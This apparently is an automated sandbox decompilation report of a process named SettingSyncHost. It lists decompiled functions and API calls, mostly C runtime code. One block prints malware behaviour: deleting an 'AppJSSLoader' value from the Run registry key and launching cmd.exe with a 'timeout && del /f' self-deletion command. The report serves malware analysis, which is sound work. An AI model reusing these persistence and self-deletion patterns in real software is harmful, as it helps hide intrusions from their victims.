                                                                                                                                      					__eflags = _t10 - 0xffffffff;
                                                                                                                                      					if(_t10 == 0xffffffff) {
                                                                                                                                      						L15:
                                                                                                                                      						_t11 = 0;
                                                                                                                                      						__eflags = 0;
                                                                                                                                      					} else {
                                                                                                                                      						_t12 = TlsSetValue(_t10,  *0x4edbc4);
                                                                                                                                      						__eflags = _t12;
                                                                                                                                      						if(_t12 == 0) {
                                                                                                                                      							goto L15;
                                                                                                                                      						} else {
                                                                                                                                      							E003A206A();
                                                                                                                                      							_t41 = __imp__EncodePointer;
                                                                                                                                      							_t14 =  *_t41( *0x4edbc0);
                                                                                                                                      							 *0x4edbc0 = _t14;
                                                                                                                                      							_t15 =  *_t41( *0x4edbc4);
                                                                                                                                      							 *0x4edbc4 = _t15;
                                                                                                                                      							_t16 =  *_t41( *0x4edbc8);
                                                                                                                                      							 *0x4edbc8 = _t16;
                                                                                                                                      							 *0x4edbcc =  *_t41( *0x4edbcc);
                                                                                                                                      							_t18 = E00399C35();
                                                                                                                                      							__eflags = _t18;
                                                                                                                                      							if(_t18 == 0) {
                                                                                                                                      								L14:
                                                                                                                                      								E00399767();
                                                                                                                                      								goto L15;
                                                                                                                                      							} else {
                                                                                                                                      								_t36 = __imp__DecodePointer;
                                                                                                                                      								_t21 =  *((intOrPtr*)( *_t36()))( *0x4edbc0, E003998EB);
                                                                                                                                      								 *0x3c7468 = _t21;
                                                                                                                                      								__eflags = _t21 - 0xffffffff;
                                                                                                                                      								if(_t21 == 0xffffffff) {
                                                                                                                                      									goto L14;
                                                                                                                                      								} else {
                                                                                                                                      									_t42 = E0039A7FF(1, 0x214);
                                                                                                                                      									__eflags = _t42;
                                                                                                                                      									if(_t42 == 0) {
                                                                                                                                      										goto L14;
                                                                                                                                      									} else {
                                                                                                                                      										__eflags =  *((intOrPtr*)( *_t36()))( *0x4edbc8,  *0x3c7468, _t42);
                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                      											goto L14;
                                                                                                                                      										} else {
                                                                                                                                      											_push(0);
                                                                                                                                      											_push(_t42);
                                                                                                                                      											E003997A4(_t30, _t36, _t42, __eflags);
                                                                                                                                      											_t26 = GetCurrentThreadId();
                                                                                                                                      											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                                                                      											 *_t42 = _t26;
                                                                                                                                      											_t11 = 1;
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					return _t11;
                                                                                                                                      				} else {
                                                                                                                                      					E00399767();
                                                                                                                                      					return 0;
                                                                                                                                      				}
                                                                                                                                      			}

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00399A9C
                                                                                                                                      • __mtterm.LIBCMT ref: 00399AA8
                                                                                                                                        • Part of subcall function 00399767: DecodePointer.KERNEL32(FFFFFFFF), ref: 00399778
                                                                                                                                        • Part of subcall function 00399767: TlsFree.KERNEL32(FFFFFFFF), ref: 00399792
                                                                                                                                        • Part of subcall function 00399767: DeleteCriticalSection.KERNEL32 ref: 00399C9C
                                                                                                                                        • Part of subcall function 00399767: _free.LIBCMT ref: 00399C9F
                                                                                                                                        • Part of subcall function 00399767: DeleteCriticalSection.KERNEL32(FFFFFFFF), ref: 00399CC6
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00399ABE
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00399ACB
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00399AD8
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00399AE5
                                                                                                                                      • TlsAlloc.KERNEL32 ref: 00399B35
                                                                                                                                      • TlsSetValue.KERNEL32(00000000), ref: 00399B50
                                                                                                                                      • __init_pointers.LIBCMT ref: 00399B5A
                                                                                                                                      • EncodePointer.KERNEL32 ref: 00399B6B
                                                                                                                                      • EncodePointer.KERNEL32 ref: 00399B78
                                                                                                                                      • EncodePointer.KERNEL32 ref: 00399B85
                                                                                                                                      • EncodePointer.KERNEL32 ref: 00399B92
                                                                                                                                      • DecodePointer.KERNEL32(Function_000098EB), ref: 00399BB3
                                                                                                                                      • __calloc_crt.LIBCMT ref: 00399BC8
                                                                                                                                      • DecodePointer.KERNEL32(00000000), ref: 00399BE2
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00399BF4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                      • API String ID: 3698121176-3819984048
                                                                                                                                      • Opcode ID: bc35c4be2fecc0e16b196f54634ebea9c92c77c9e6e38d30903cec3c2d46c4bb
                                                                                                                                      • Instruction ID: 5926bc16dd7cb4e37b33bd25f6d6967175340d8452ee96000263bd3ba81ba8d4
                                                                                                                                      • Opcode Fuzzy Hash: bc35c4be2fecc0e16b196f54634ebea9c92c77c9e6e38d30903cec3c2d46c4bb
                                                                                                                                      • Instruction Fuzzy Hash: 35314235D003919ECF16AF79AC89B153EA4FB44720B1705BBE424DA2B2EB75A840CF64
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                      			E00394935(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                      				intOrPtr _t13;
                                                                                                                                      				intOrPtr _t14;
                                                                                                                                      				intOrPtr _t17;
                                                                                                                                      				intOrPtr _t19;
                                                                                                                                      				void* _t42;
                                                                                                                                      				intOrPtr* _t50;
                                                                                                                                      
                                                                                                                                      				if(_a4 > 5 || _a8 == 0) {
                                                                                                                                      					L4:
                                                                                                                                      					return 0;
                                                                                                                                      				} else {
                                                                                                                                      					_t50 = E0039A7FF(8, 1);
                                                                                                                                      					_t56 = _t50;
                                                                                                                                      					if(_t50 != 0) {
                                                                                                                                      						_t13 = E0039A7FF(0xd8, 1);
                                                                                                                                      						 *_t50 = _t13;
                                                                                                                                      						__eflags = _t13;
                                                                                                                                      						if(_t13 != 0) {
                                                                                                                                      							_t14 = E0039A7FF(0x220, 1);
                                                                                                                                      							 *((intOrPtr*)(_t50 + 4)) = _t14;
                                                                                                                                      							__eflags = _t14;
                                                                                                                                      							if(_t14 != 0) {
                                                                                                                                      								E00393C5D( *_t50, 0x3c7210);
                                                                                                                                      								_t47 =  *_t50;
                                                                                                                                      								_t17 = E00394719(_a4,  *_t50, _a8);
                                                                                                                                      								_pop(_t42);
                                                                                                                                      								__eflags = _t17;
                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                      									_t19 = E0039A177(_t42, _t47, __eflags,  *((intOrPtr*)( *_t50 + 4)),  *((intOrPtr*)(_t50 + 4)));
                                                                                                                                      									__eflags = _t19;
                                                                                                                                      									if(_t19 == 0) {
                                                                                                                                      										 *((intOrPtr*)( *((intOrPtr*)(_t50 + 4)))) = 1;
                                                                                                                                      										 *((intOrPtr*)( *((intOrPtr*)(_t50 + 4)))) = 1;
                                                                                                                                      										L17:
                                                                                                                                      										return _t50;
                                                                                                                                      									}
                                                                                                                                      									E00399DFA( *((intOrPtr*)(_t50 + 4)));
                                                                                                                                      									E00399323( *_t50);
                                                                                                                                      									E003993BC( *_t50);
                                                                                                                                      									E00399DFA(_t50);
                                                                                                                                      									L15:
                                                                                                                                      									_t50 = 0;
                                                                                                                                      									goto L17;
                                                                                                                                      								}
                                                                                                                                      								E00399323( *_t50);
                                                                                                                                      								E003993BC( *_t50);
                                                                                                                                      								E00399DFA(_t50);
                                                                                                                                      								goto L15;
                                                                                                                                      							}
                                                                                                                                      							E00399DFA( *_t50);
                                                                                                                                      							E00399DFA(_t50);
                                                                                                                                      							L8:
                                                                                                                                      							goto L3;
                                                                                                                                      						}
                                                                                                                                      						E00399DFA(_t50);
                                                                                                                                      						goto L8;
                                                                                                                                      					}
                                                                                                                                      					L3:
                                                                                                                                      					 *((intOrPtr*)(E0039960F(_t56))) = 0xc;
                                                                                                                                      					goto L4;
                                                                                                                                      				}
                                                                                                                                      			}










                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 888903860-0
                                                                                                                                      • Opcode ID: 12f15651d564fa1329d616e07d3d9b787ae13040ba8b07dc519aa441bcc5a3ae
                                                                                                                                      • Instruction ID: 9d0c9556b0fb350401f97898d9bf8283cd01d8d2a0bac011fe3c9cf92b9f0c6e
                                                                                                                                      • Opcode Fuzzy Hash: 12f15651d564fa1329d616e07d3d9b787ae13040ba8b07dc519aa441bcc5a3ae
                                                                                                                                      • Instruction Fuzzy Hash: D321C7351046019BEF27BF6DD883E1BBBE9EF86760B21441EF4855E291FF329D018651
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$Info
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2509303402-0
                                                                                                                                      • Opcode ID: 7d1e762005dd37c2c36f4949c227c61766002dafb81430b5d05b909618b77b3d
                                                                                                                                      • Instruction ID: 1e51728f042aa4de71853f4a3ec4c78424979f7541819a6a9c270e5d8ed88512
                                                                                                                                      • Opcode Fuzzy Hash: 7d1e762005dd37c2c36f4949c227c61766002dafb81430b5d05b909618b77b3d
                                                                                                                                      • Instruction Fuzzy Hash: 59D1DF71D003A59FDB12CFA6C885BEEBBF5BF48300F144269E495AB282D771A945CB10
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 003ED338
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC4BA
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC4CC
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC4DE
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC4F0
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC502
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC514
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC526
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC538
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC54A
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC55C
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC56E
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC580
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC592
                                                                                                                                      • _free.LIBCMT ref: 003ED32D
                                                                                                                                        • Part of subcall function 003E5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7), ref: 003E5CD5
                                                                                                                                        • Part of subcall function 003E5CBF: GetLastError.KERNEL32(003CB0A7,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7,003CB0A7), ref: 003E5CE7
                                                                                                                                      • _free.LIBCMT ref: 003ED34F
                                                                                                                                      • _free.LIBCMT ref: 003ED364
                                                                                                                                      • _free.LIBCMT ref: 003ED36F
                                                                                                                                      • _free.LIBCMT ref: 003ED391
                                                                                                                                      • _free.LIBCMT ref: 003ED3A4
                                                                                                                                      • _free.LIBCMT ref: 003ED3B2
                                                                                                                                      • _free.LIBCMT ref: 003ED3BD
                                                                                                                                      • _free.LIBCMT ref: 003ED3F5
                                                                                                                                      • _free.LIBCMT ref: 003ED3FC
                                                                                                                                      • _free.LIBCMT ref: 003ED419
                                                                                                                                      • _free.LIBCMT ref: 003ED431
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                      • Opcode ID: 869cd617220a7378d59ae0f2ac8a98df9622efe2eafe1c9f8bbfef27ae9a243f
                                                                                                                                      • Instruction ID: b0689c525cc8a9f83ebf9c106b6eac1b24d296656f2eb9022f805e42d36d47af
                                                                                                                                      • Opcode Fuzzy Hash: 869cd617220a7378d59ae0f2ac8a98df9622efe2eafe1c9f8bbfef27ae9a243f
                                                                                                                                      • Instruction Fuzzy Hash: 27318F71600BA49FDB62AB3BD945B5A73E8AF04310F258A29F456DB2D1DF30FC408B21
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D07CF
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D07F1
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D0811
                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 003D097A
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D0992
                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003D09B4
                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003D09B9
                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003D09BE
                                                                                                                                      Strings
                                                                                                                                      Similarity
                                                                                                                                      • API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                      • String ID: false$true$}n?
                                                                                                                                      • API String ID: 3742692055-3006997818
                                                                                                                                      • Opcode ID: fd148a89c460755a75cbab5a3428c43a8e6ad126a4dde25cde92b523174b77f5
                                                                                                                                      • Instruction ID: 1375a96aa085407da3bb63943878f7c0bdae2ddd2d2fc13a1d35431faa937fb1
                                                                                                                                      • Opcode Fuzzy Hash: fd148a89c460755a75cbab5a3428c43a8e6ad126a4dde25cde92b523174b77f5
                                                                                                                                      • Instruction Fuzzy Hash: 2861D1B29003058FDB16DF64E941BAEBBF4AF04714F10856EE845AB382DB75A905CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                      • Opcode ID: 99f73b19beaf11ab3bc7074eb61600f7645c5076831812d9bf15b00d77b52f42
                                                                                                                                      • Instruction ID: 9998746e77bbaeb5ba29de026e9bbeb57660fe358793ee52781617f49bccedcb
                                                                                                                                      • Opcode Fuzzy Hash: 99f73b19beaf11ab3bc7074eb61600f7645c5076831812d9bf15b00d77b52f42
                                                                                                                                      • Instruction Fuzzy Hash: D5C18676E40255AFDB21DBA9CC42FEE77F8AB09744F140265FA05FB2C2D670AD418B50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 0-3907804496
                                                                                                                                      • Opcode ID: 3b355cbfbb85fa0ce3c2929912e943a305652290256c1839dba0bcacc6fba872
                                                                                                                                      • Instruction ID: 35e5ef7ba8294d9e5fd260ad869d5dae3c64af5488282c06ab7c752f11867103
                                                                                                                                      • Opcode Fuzzy Hash: 3b355cbfbb85fa0ce3c2929912e943a305652290256c1839dba0bcacc6fba872
                                                                                                                                      • Instruction Fuzzy Hash: 34C11370E046A99FDF16DF9AC881BAD7BB4AF09310F054659E501BB3C2C731AD41CB62
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003F3E3A: CreateFileW.KERNEL32(00000000,?,?,*B?,?,?,00000000,?,003F422A,00000000,0000000C), ref: 003F3E57
                                                                                                                                      • GetLastError.KERNEL32 ref: 003F4295
                                                                                                                                      • __dosmaperr.LIBCMT ref: 003F429C
                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 003F42A8
                                                                                                                                      • GetLastError.KERNEL32 ref: 003F42B2
                                                                                                                                      • __dosmaperr.LIBCMT ref: 003F42BB
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 003F42DB
                                                                                                                                      • CloseHandle.KERNEL32(003EFB86), ref: 003F4428
                                                                                                                                      • GetLastError.KERNEL32 ref: 003F445A
                                                                                                                                      • __dosmaperr.LIBCMT ref: 003F4461
                                                                                                                                      Strings
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                      • String ID: H
                                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                                      • Opcode ID: ab6e68a8e372c9c42d832844a3594b86e7ec977fc99ca0a723950b901d80c8c5
                                                                                                                                      • Instruction ID: 8f5b91131b021329728078ef848fc88ac8dbb014bccbe60277cd3ffc9fa6fb67
                                                                                                                                      • Opcode Fuzzy Hash: ab6e68a8e372c9c42d832844a3594b86e7ec977fc99ca0a723950b901d80c8c5
                                                                                                                                      • Instruction Fuzzy Hash: A5A12632A142589FCF1ADF68DC52BBE3BB5AB06320F190259F901AF2D1CB358D52CB51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,982F9315), ref: 003D1407
                                                                                                                                      • RegDeleteValueA.ADVAPI32(00000000,AppJSSLoader), ref: 003D141D
                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 003D1425
                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 003D1438
                                                                                                                                      • ShellExecuteA.SHELL32(00000000,open,C:\Windows\System32\cmd.exe,?), ref: 003D151D
                                                                                                                                      Strings
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Module$DeleteExecuteFileHandleNameOpenShellValue
                                                                                                                                      • String ID: /c timeout 5 && del /f $AppJSSLoader$C:\Windows\System32\cmd.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$open
                                                                                                                                      • API String ID: 3039155974-3588390337
                                                                                                                                      • Opcode ID: ff351892b08866cffe642497e63e2db0cb2f3854cb15f3b591a94c97e13cc7de
                                                                                                                                      • Instruction ID: 893a797c198278b2fdf5fd5e53e98e14fadc92bf7f4f9fc0452a32072498b005
                                                                                                                                      • Opcode Fuzzy Hash: ff351892b08866cffe642497e63e2db0cb2f3854cb15f3b591a94c97e13cc7de
                                                                                                                                      • Instruction Fuzzy Hash: 6E5108729002089FDB29DF64ED85BEDBBB5EB45304F10459DE105AB7C1CBB4AA84CF91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 003DD1AE
                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 003DD1D0
                                                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 003DD2DF
                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 003DD3B1
                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 003DD435
                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 003DD450
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                      • API String ID: 2123188842-393685449
                                                                                                                                      • Opcode ID: 3231d8375557234f690f6d2ca87fd7439f6baf62d10ae55b66d728045b8e75b9
                                                                                                                                      • Instruction ID: fda907d034dfdf217a22ceee0039a3c50d96a52691b6c0d6fe46c054e91d2c61
                                                                                                                                      • Opcode Fuzzy Hash: 3231d8375557234f690f6d2ca87fd7439f6baf62d10ae55b66d728045b8e75b9
                                                                                                                                      • Instruction Fuzzy Hash: 26B15A76C00209EFCF16DFA4E8819AEBBB9FF08310B15455BE8116B352D731EA51CB92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _free.LIBCMT ref: 003E590E
                                                                                                                                        • Part of subcall function 003E5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7), ref: 003E5CD5
                                                                                                                                        • Part of subcall function 003E5CBF: GetLastError.KERNEL32(003CB0A7,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7,003CB0A7), ref: 003E5CE7
                                                                                                                                      • _free.LIBCMT ref: 003E591A
                                                                                                                                      • _free.LIBCMT ref: 003E5925
                                                                                                                                      • _free.LIBCMT ref: 003E5930
                                                                                                                                      • _free.LIBCMT ref: 003E593B
                                                                                                                                      • _free.LIBCMT ref: 003E5946
                                                                                                                                      • _free.LIBCMT ref: 003E5951
                                                                                                                                      • _free.LIBCMT ref: 003E595C
                                                                                                                                      • _free.LIBCMT ref: 003E5967
                                                                                                                                      • _free.LIBCMT ref: 003E5975
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                      • Opcode ID: 0ec44a597dc37af505336f9e13a72f5e516f58f9da8a1a7ae45aea37785a1ece
                                                                                                                                      • Instruction ID: 11983b4a443f54bc94a9cb0a1d0ca22e3509714a19c7bca3b1521c050dbaaa25
                                                                                                                                      • Opcode Fuzzy Hash: 0ec44a597dc37af505336f9e13a72f5e516f58f9da8a1a7ae45aea37785a1ece
                                                                                                                                      • Instruction Fuzzy Hash: F821EA76900658EFCB42EF95C891DDD7BB9BF08344F104665F5069F261DB31DA44DB80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,003F5BAF), ref: 003F4AB3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DecodePointer
                                                                                                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                      • API String ID: 3527080286-3064271455
                                                                                                                                      • Opcode ID: ea4db97d96a50c70f5fef1cfe8b68e0ba981af7e7b6542e0b9266b652710bb4d
                                                                                                                                      • Instruction ID: 5af13bffeb1f8dc8a0d10ec39531595942eb9fcdfd7e31b327ccb2ef638b1226
                                                                                                                                      • Opcode Fuzzy Hash: ea4db97d96a50c70f5fef1cfe8b68e0ba981af7e7b6542e0b9266b652710bb4d
                                                                                                                                      • Instruction Fuzzy Hash: 6A51787490060EDBCF168FA9EA4C2BFBFB8FB44310F125045E681A76A5CBB48D25DB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                      • Opcode ID: 81cd696ce5c9c6c02c55a802a2f7dd679b166f2e8be2015c2c63c54b7f5d9dcf
                                                                                                                                      • Instruction ID: ccf1de70601b7e1af2143765b885bf16bdd0759677370192c3be00d454b52809
                                                                                                                                      • Opcode Fuzzy Hash: 81cd696ce5c9c6c02c55a802a2f7dd679b166f2e8be2015c2c63c54b7f5d9dcf
